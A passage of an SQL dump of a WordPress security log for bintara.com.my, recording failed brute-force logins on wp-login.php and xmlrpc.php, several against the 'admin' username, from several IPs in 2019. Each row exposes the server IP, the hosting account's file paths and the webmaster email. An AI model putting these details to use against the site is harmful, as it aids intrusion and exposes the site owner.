17:52:10',17740096,19232072,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(24670,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"59794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEdTUViJhUiKk@yAofChQAAAYM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568742733.9757\";s:12:\"REQUEST_TIME\";s:10:\"1568742733\";}}','notice','2019-09-17 17:52:17','2019-09-17 17:52:14',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(24671,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"40746\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEgVkViJhUiKk@yAofEJQAAAZY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568743511.0869\";s:12:\"REQUEST_TIME\";s:10:\"1568743511\";}}','notice','2019-09-17 18:05:14','2019-09-17 18:05:11',17740328,19232088,'https://bintara.com.my/wp-login.php',1,0,'100.26.104.241'),(24672,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"41896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEgXX-mRYMgL5SYt2EUIwAAAVI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568743517.5941\";s:12:\"REQUEST_TIME\";s:10:\"1568743517\";}}','notice','2019-09-17 18:05:20','2019-09-17 18:05:18',18254488,19551576,'https://bintara.com.my/xmlrpc.php',1,0,'100.26.104.241'),(24673,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.74.119\";s:11:\"REMOTE_PORT\";s:5:\"55992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEiYfgg4cIpXyxKa5446gAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744033.8526\";s:12:\"REQUEST_TIME\";s:10:\"1568744033\";}}','notice','2019-09-17 18:13:56','2019-09-17 18:13:54',17744768,19232072,'https://bintara.com.my/wp-login.php',1,0,'167.99.74.119'),(24674,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.74.119\";s:11:\"REMOTE_PORT\";s:5:\"55992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEiYfgg4cIpXyxKa5446gAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744033.8526\";s:12:\"REQUEST_TIME\";s:10:\"1568744033\";}}','notice','2019-09-17 18:13:56','2019-09-17 18:13:54',17907680,19232072,'https://bintara.com.my/wp-login.php',1,0,'167.99.74.119'),(24675,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.74.119\";s:11:\"REMOTE_PORT\";s:5:\"56726\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEiZEViJhUiKk@yAofE@gAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568744038.231\";s:12:\"REQUEST_TIME\";s:10:\"1568744038\";}}','notice','2019-09-17 18:13:59','2019-09-17 18:13:58',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.74.119'),(24676,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.65.69.32\";s:11:\"REMOTE_PORT\";s:5:\"58586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEj00ViJhUiKk@yAofFkAAAAYA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744403.2918\";s:12:\"REQUEST_TIME\";s:10:\"1568744403\";}}','notice','2019-09-17 18:20:09','2019-09-17 18:20:03',17740488,19230192,'https://bintara.com.my/wp-login.php',1,0,'159.65.69.32'),(24677,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.65.69.32\";s:11:\"REMOTE_PORT\";s:5:\"59832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEj3MptRwTKB9qWFzHjKAAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744413.3542\";s:12:\"REQUEST_TIME\";s:10:\"1568744413\";}}','notice','2019-09-17 18:20:16','2019-09-17 18:20:13',18258936,19556464,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.69.32'),(24678,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.64.192\";s:11:\"REMOTE_PORT\";s:5:\"53138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEj6UViJhUiKk@yAofFmgAAAY4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568744425.33\";s:12:\"REQUEST_TIME\";s:10:\"1568744425\";}}','notice','2019-09-17 18:20:27','2019-09-17 